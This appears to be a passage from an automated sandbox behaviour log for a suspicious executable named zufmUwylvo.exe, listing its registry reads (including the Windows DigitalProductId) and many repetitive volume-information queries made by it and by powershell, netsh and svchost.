          Source: C:\Users\user\Desktop\zufmUwylvo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeQueries volume information: C:\Users\user\Desktop\zufmUwylvo.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
